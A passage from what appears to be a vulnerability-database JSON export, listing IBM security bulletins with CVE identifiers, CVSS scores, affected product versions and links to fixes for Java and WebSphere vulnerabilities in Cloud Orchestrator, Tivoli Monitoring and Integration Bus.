"userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T15:24:15", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Monitoring embedded WebSphere Application Server (CVE-2016-3426, CVE-2016-3427, CVE-2016-0306, CVE-2015-0254)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2016-0306", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:24:15", "id": "E568EF1AEDF71160C521687EEF39BAD4E7E38A89F906FA2D8B03A2FB9255CCC7", "href": "https://www.ibm.com/support/pages/node/281335", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:56:00", "description": "## Summary\n\nIBM WebSphere Application Server is shipped with IBM Cloud Orchestrator and Cloud Orchestrator Enterprise. Additionally, IBM Business Process Manager is shipped with IBM Cloud Orchestrator. The IBM SmartCloud Cost Management and IBM Tivoli Monitoring are shipped with Cloud Orchestrator Enterprise. \n \nInformation about a potential security vulnerability affecting IBM WebSphere Application Server, IBM SmartCloud Cost Management, IBM Business Process Manager, and Tivoli Monitoring are published in a security bulletin. \n \nNote: IBM Cloud Orchestrator V2.4 FixPack 4 is not affected as it ships with IBM WebSphere Application Server V8.5.5.10.\n\n## Vulnerability Details\n\nConsult the [_Security Bulletin: Vulnerability in Apache Standard Taglibs affects IBM WebSphere Application Server (CVE-2015-0254)_](<http://www.ibm.com/support/docview.wss?uid=swg21978495>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator V2.5, V2.5.0.1, V2.5.0.2, V2.4, V2.4.01, V2.4.0.2, V2.4.0.3| \n\n * IBM WebSphere Application Server V8.5.5 through V8.5.5.7 Traditional Full profile\n * IBM Business Process Manager Standard V8.5.5 - V8.5.6.2 \nIBM Cloud Orchestrator V2.3, V2.3.0.1 through Interim Fix 9| \n\n * IBM WebSphere Application Server V8.0, V8.0.11\n * IBM Business Process Manager Standard V8.5.0.1 \n \n| \n \nIBM Cloud Orchestrator Enterprise V2.5, V2.5.0.1, V2.5.0.2, V2.4, V2.4.01, V2.4.0.2, V2.4.0.3| \n\n * IBM WebSphere Application Server V8.5.5 through V8.5.5.7 Traditional Full and Liberty profile\n * IBM SmartCloud Cost Management V2.1.0.4 through V2.1.0.5\n * IBM Tivoli Monitoring V6.3.0.2 \nIBM Cloud Orchestrator Enterprise V2.3, V2.3.0.1 through Interim Fix 9| \n\n * IBM WebSphere Application Server V8.0, V8.0.11\n * IBM SmartCloud Cost Management V2.1.0.3 \n * IBM Tivoli Monitoring V6.3.0.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletins for information about fixes addressed by IBM WebSphere Application Server and IBM Business Process Manager, which is shipped with IBM Cloud Orchestrator. \n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Cloud Orchestrator V2.5, V2.5.0.1, V2.5.0.2, V2.4, V2.4.01, V2.4.0.2,V2.4.0.3, | \n\n * WebSphere Application Server V8.5.5 - V8.5.5.7 \n * IBM Business Process Manager Standard V8.5.5 - V8.5.6.2 \n\n| [_Security Bulletin: Vulnerability in Apache Standard Taglibs affects IBM WebSphere Application Server (CVE-2015-0254)_](<http://www.ibm.com/support/docview.wss?uid=swg21978495>)\n\n[](<http://www-01.ibm.com/support/docview.wss?uid=swg21985316>)\n\n \n[Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (CVE-2015-0254)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985316>) \nIBM Cloud Orchestrator V2.3, V2.3.0.1 through Interim Fix 9| \n\n * IBM WebSphere Application Server V8.0, V8.0.11\n * IBM Business Process Manager Standard V8.5.0.1\n| Contact [IBM Support ](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>) \n \nRefer to the following security bulletins for information about fixes addressed by IBM WebSphere Application Server, IBM SmartCloud Cost Management, and Tivoli Monitoring, which are shipped with IBM Cloud Orchestrator Enterprise edition. **Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Cloud Orchestrator Enterprise V2.5, V2.5.0.1, V2.5.0.2, V2.4, V2.4.0.1, V2.4.0.2,V2.4.0.3| \n\n * WebSphere Application Server V8.5.5 - V8.5.5.7 Full and Liberty Profile \n * IBM SmartCloud Cost Management V2.1.0.3 through V2.1.0.5\n| [_Security Bulletin: Vulnerability in Apache Standard Taglibs affects IBM WebSphere Application Server (CVE-2015-0254)_](<http://www.ibm.com/support/docview.wss?uid=swg21978495>)\n\n[](<http://www-01.ibm.com/support/docview.wss?uid=swg21984732>) \n \n * Tivoli Monitoring V6.3.0.2\n| [Security Bulletin: IBM Tivoli Monitoring embedded WebSphere Application Server (CVE-2016-3426, CVE-2016-3427, CVE-2016-0306, CVE-2015-0254)](<http://www-01.ibm.com/support/docview.wss?uid=swg21984732>) \nIBM Cloud Orchestrator Enterprise V2.3, V2.3.0.1 through Interim Fix 9| \n\n * IBM WebSphere Application Server V8.0, V8.0.11\n * IBM SmartCloud Cost Management V2.1.0.3 \n * Tivoli Monitoring V6.3.0.1\n| Contact [IBM Support ](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T22:33:17", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM Cloud Orchestrator and Cloud Orchestrator Enterprise edition (CVE-2015-0254)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2016-0306", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:33:17", "id": "DE915924CF7F2670B1FFCDF6498DBB124F4087216A8B4D38EBCEE133912CE5E2", "href": "https://www.ibm.com/support/pages/node/619355", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:38:43", "description": "## Summary\n\nMultiple security vulnerabilities exist in the IBM\u00ae Runtime Environment Java\u2122 Technology Edition 6.0.16.21 (and earlier) used by WebSphere Message Broker, and the IBM\u00ae Runtime Environment Java\u2122 Technology Edition 7.0.9.31 (and earlier) used by WebSphere Message Broker and IBM Integration Bus, and the IBM\u00ae Runtime Environment Java\u2122 Technology Edition 7.1.3.31 (and earlier) used by IBM Integration Bus. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3443_](<https://vulners.com/cve/CVE-2016-3443>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE related to the 2D component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112452_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112452>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVEID:** [_CVE-2016-3422_](<https://vulners.com/cve/CVE-2016-3422>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE related to the 2D component could allow a remote attacker to cause a denial of service resulting in a partial availability impact using unknown attack vectors. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112454_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112454>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2016-0264_](<https://vulners.com/cve/CVE-2016-0264>)** \nDESCRIPTION:** A buffer overflow vulnerability in the IBM JVM facilitates arbitrary code execution under certain limited circumstances. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110867_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110867>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Integration Bus V10, V9 \n\nWebSphere Message Broker V8\n\nIBM Integration Toolkit V9\n\nWebSphere Message Broker Toolkit V8 \n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/Fix** \n---|---|---|--- \nIBM Integration Bus \n \n \n| V10 \n \n| IT14975 | An interim fix is available from IBM Fix Central for all platforms except HP \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=IT14975](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=IT14975>) \n \nThe APAR is targeted to be available in fix pack 10.0.0.5 \nIBM Integration Bus \n \n \n| V9 \n \n| IT14975 | An interim fix is available from IBM Fix Central for all platforms except HP \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=>) IT14975 \n \nThe APAR is targeted to be available in fix pack 9.0.0.6 \nWebSphere Message Broker (8.0.0.7 or with APAR IT03599 applied*)| V8| IT14975| An interim fix is available from IBM Fix Central for all platforms except HP \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars= IT14975](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars=%20IT14975>) \n \n* For V8.0 users IT14975 is applicable if: \n\\- you are using fix pack 8.0.0.7 \n\\- or you have APAR [IT03599](<http://www-01.ibm.com/support/docview.wss?uid=swg1IT03599>) applied to a fixpack prior to 8.0.0.7 \n \nThe APAR is targeted to be available in fix pack 8.0.0.8 \nWebSphere Message Broker (8.0.0.6 or below with APAR IT03599 not applied**) \n \n| V8 \n| IT14970| An interim fix is available from IBM Fix Central for all platforms except HP \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibms~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars=IT14970](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars=IT14970>) \n \n** For V8.0 users IT14970 is applicable if: \n\\- you are using a fix pack prior to 8.0.0.7 \n\\- and you do not have APAR [IT03599](<http://www-01.ibm.com/support/docview.wss?uid=swg1IT03599>) applied \n \n**_To address Java vulnerabilities in Toolkit_** \n \n**Product**| **VRMF**| **APAR**| **Remediation/Fix** \n---|---|---|--- \nIBM Integration Toolkit| V9.0| IT14975| An intim fix is available from IBM Fix Central \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=IT14975](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=IT14975>) \nWebSphere Message Broker \nToolkit| V8.0| IT14970| An interim fix is available from IBM Fix Central \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars= IT14970](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars=%20IT14970>) \n \n_For unsupported versions of the product IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n \nThe planned maintenance release dates for WebSphere Message Broker and IBM Integration Bus are available at : \n[http://www.ibm.com/support/docview.wss?uid=swg27006308 ](<http://www.ibm.com/support/docview.wss?uid=swg27006308>) \n\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-03-23T20:41:52", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere Message Broker and IBM Integration Bus", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0264", "CVE-2016-3422", "CVE-2016-3426", "CVE-2016-3427", "CVE-2016-3443"], "modified": "2020-03-23T20:41:52", "id": "21814730A396F5E3C91B95B6F895601A0824D3A6D8E235F7EFBA63C853BE3563", "href": "https://www.ibm.com/support/pages/node/278331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:56:04", "description": "## Summary\n\nInformation about a security vulnerability that affects IBM Java SDK, IBM WebSphere Application Server, and bundling products of IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise Edition has been published in a security bulletin. \n \nThese issues were also addressed by IBM WebSphere Application Server, IBM Business Process Manager and IBM Tivoli System Automation Application Manager, which are shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. \nAdditionally, these issues were also addressed by IBM Tivoli Monitoring and SmartCloud Cost Management, which are shipped with IBM Cloud Orchestrator Enterprise. \n\n## Vulnerability Details\n\nIBM WebSphere Application Server, IBM Tivoli System Automation Application Manager, and IBM Business Process Manager are shipped as components of IBM Cloud Orchestrator and Cloud Orchestrator Enterprise Edition. Additionally, the IBM Tivoli Monitoring and SmartCloud Cost Management are also shipped with IBM Cloud Orchestrator Enterprise Edition. \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator version 2.5, 2.5.0.1, V2.5.0.2| IBM WebSphere Application Server Network Deployment V8.5.5 through 8.5.5.7 \nIBM Business Process Manager Standard V8.5.6 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM Cloud Orchestrator version 2.4, 2.4.0.1, 2.4.0.2, 2.4.0.3| IBM WebSphere Application Server Network Deployment V8.5.5 through 8.5.5.7 \nIBM Business Process Manager Standard V8.5.5 through 8.5.6 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM Cloud Orchestrator version 2.3, 2.3.0.1| IBM WebSphere Application Server V8.0.1 through V8.0.0.11 \nIBM Business Process Manager V 8.5, 8.5.6 \nIBM Cloud Orchestrator Enterprise V2.5, V2.5.0.1, V2.5.0.2| IBM Business Process Manager Standard 8.5.6 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM SmartCloud Cost Management 2.1.0.5 \nIBM Tivoli Monitoring 6.3.0.2 \nIBM Cloud Orchestrator Enterprise V2.4, V2.4.0.1, V2.4.0.2, V2.4.0.3| IBM Business Process Manager Standard 8.5.6 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM SmartCloud Cost Management 2.1.0.4 \nIBM Tivoli Monitoring 6.3.0.2 \nIBM SmartCloud Orchestrator Enterprise V2.3 and V2.3.0.1 from \nInterim Fix1 through Interim Fix 9| IBM Business Process Manager Standard 8.5 \nIBM SmartCloud Cost Management V2.1.0.3 \nIBM Tivoli Monitoring V6.3.0.1 \n \n## Remediation/Fixes\n\nThese issues were addressed by IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise through the bundled products IBM WebSphere Application Server, IBM Business Process Manager, and IBM Tivoli System Automation Application Manager, which are shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. \nAdditionally, these issues were also addressed by IBM Tivoli Monitoring and SmartCloud Cost Management, which are shipped with IBM Cloud Orchestrator Enterprise. \n\nRefer to the following security bulletins for information about fixes for IBM Cloud Orchestrator:\n\n** Product and Version(s)**| **Remediation/First Fix ** \n---|--- \nIBM Cloud Orchestrator V2.5, 2.5.0.1, V2.5.0.2| _Upgrade to IBM Cloud Orchestrator Fix Pack 2 (2.5.0.2) for 2.5 _ \n[__http://www-01.ibm.com/support/docview.wss?uid=swg27045667__](<http://www-01.ibm.com/support/docview.wss?uid=swg27045667>) \n \nAfter upgrade to IBM Cloud Orchestrator 2.5.0.2 you need to install the corresponding APAR from WebSphere Application Server. Follow the instructions on this link: [_http://www.ibm.com/support/docview.wss?uid=swg21982223_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>). \nIBM Cloud Orchestrator V2.4, V2.4.0.1, V2.4.0.2 v2.4.0.3| Contact [_IBM Support _](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>) \nFor all releases of V2.4, fix will be made available in V2.4.0.4. \n \nIf you are running IBM Cloud Orchestrator Enterprise Edition V2.4 through 2.4.0,3, install the corresponding APAR from WebSphere Application Server. Follow the instructions on this link: [_http://www.ibm.com/support/docview.wss?uid=swg21982223_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>) \nIBM SmartCloud Orchestrator version V2.3, V2.3.0.1| Contact [_IBM Support _](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>) \n \nRefer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server, Tivoli System Automation Application Manager, and Business Process Manager that are shipped with IBM Cloud Orchestrator. \n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Remediation/First Fix/ Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Cloud Orchestrator V2.5, v2.5.0.1, V2.5.0.2, V2.4, V2.4.0.1, V2.4.0.2 and 2.4.0.3| IBM WebSphere Application Server Network Deployment V8.5.5 through 8.5.5.7 \n| [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) \nIBM Tivoli System Automation Application Manager 4.1| [_Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-3426, CVE-2016-3427)_](<http://www.ibm.com/support/docview.wss?uid=swg21982644>) . \nIBM Business Process Manager V8.5.5 thorugh 8.5.6| [_Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982559>). \nIBM Cloud Orchestrator V2.3, V2.3.0.1| IBM WebSphere Application Server V8.0.1 through V8.0.0.11 \n\n \n\n\n| [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) \nIBM Business Process Manager V 8.5, 8.5.6| [_Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982559>). \n \nRefer to the following security bulletins for information about fixes for IBM Cloud Orchestrator Enterprise Edition:\n\n**Principal Product and Version**| **Remediation/First Fix** \n---|--- \nIBM Cloud Orchestrator Enterprise V2.5, V2.5.0.1, V2.5.0.2| _Apply IBM Cloud Orchestrator Enterprise Fix Pack 2 (2.5.0.2) for 2.5 _ \n[__http://www-01.ibm.com/support/docview.wss?uid=swg27045667__](<http://www-01.ibm.com/support/docview.wss?uid=swg27045667>) \nIBM Cloud Orchestrator Enterprise V2.4, V2.4.0.1, V2.4.0.2, V2.4.0.3| Contact [_IBM Support _](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>) \nFor all releases of V2.4, fix will be made available in V2.4.0.4. \nIBM SmartCloud Orchestrator Enterprise V2.3 and V2.3.0.1 from Interim fix1 through Interim Fix 9| Contact [_IBM Support _](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>) \n \nRefer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server, Tivoli System Automation Application Manager, Business Process Manager, SmartCloud Cost Management, and Tivoli Monitoring, which are shipped with IBM Cloud Orchestrator Enterprise Edition:\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Remediation/First Fix/ Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Cloud Orchestrator Enterprise V2.5, v2.5.0.1, V2.5.0.2, V2.4, V2.4.0.1, V2.4.0.2 and V2.4.0.3| IBM WebSphere Application Server Network Deployment V8.5.5 through 8.5.5.7 | [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) \nIBM Tivoli System Automation Application Manager V4.1| [_Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-3426, CVE-2016-3427)_](<http://www.ibm.com/support/docview.wss?uid=swg21982644>) \nIBM Business Process Manager V 8.5, 8.5.6| [_Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982559>) \nSmartCloud Cost Management V2.1.0.4 and V2.1.0.5| for CVE-2015-7575 SmartCloud Cost Management is shipped as component of IBM Cloud Orchestrator Enterprise Edition \nIBM Tivoli Monitoring V6.3.0.1| [_ Security Bulletin: IBM Tivoli Monitoring embedded WebSphere Application Server (CVE-2016-3426, CVE-2016-3427, CVE-2016-0306, CVE-2015-0254)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21984732>) \nIBM SmartCloud Orchestrator Enterprise V2.3 and V2.3.0.1 from Interim fix1 through Interim Fix 9| IBM WebSphere Application Server V8.0.1 through V8.0.0.11 \n\n \n\n\n| [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) \nIBM Business Process Manager V 8.5, 8.5.6| [_Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982559>). \nSmartCloud Cost Management V2.1.0.3| for CVE-2015-7575 SmartCloud Cost Management is shipped as component of IBM Cloud Orchestrator Enterprise Edition \nIBM Tivoli Monitoring V6.3.0.1| [_ Security Bulletin: IBM Tivoli Monitoring embedded WebSphere Application Server (CVE-2016-3426, CVE-2016-3427, CVE-2016-0306, CVE-2015-0254)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21984732>) \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T22:33:08", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server and bundling products shipped with IBM Cloud Orchestrator (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2015-7575", "CVE-2016-0306", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:33:08", "id": "C9A06C4BC1ACE55A17C7DD2D9DD98AA6FDEE59C9586CAFC2375754D88139C6F2", "href": "https://www.ibm.com/support/pages/node/619333", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:16:10", "description": "A remote code execution vulnerability exists in Apache Tomcat. Successful exploitation of this vulnerability could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-27T00:00:00", "type": "checkpoint_advisories", "title": "Apache 